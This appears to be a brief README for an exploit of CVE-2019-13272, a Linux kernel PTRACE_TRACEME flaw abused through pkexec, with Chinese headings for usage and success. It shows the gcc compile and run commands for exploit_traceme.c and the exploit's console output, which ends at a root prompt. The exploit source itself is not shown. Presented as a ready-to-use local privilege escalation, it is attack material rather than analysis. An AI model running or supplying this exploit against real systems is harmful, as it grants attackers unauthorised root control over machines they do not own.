CVE-2019-13272

Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec

使用

ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme
ujas@kali:~$ ./exploit_traceme
    Welcome to your Arsenal!
    accessing variables...
    execution has reached EOP.
    familiar trunks are been searched ...
    trunk helper found: /usr/sbin/mate-power-backlight-helper
    helper initiated: /usr/sbin/mate-power-backlight-helper
    SUID process is being initiated (/usr/bin/pkexec) ...
    midpid is being traced...
    midpid attached.
root@kali:/home/ujas#
提权成功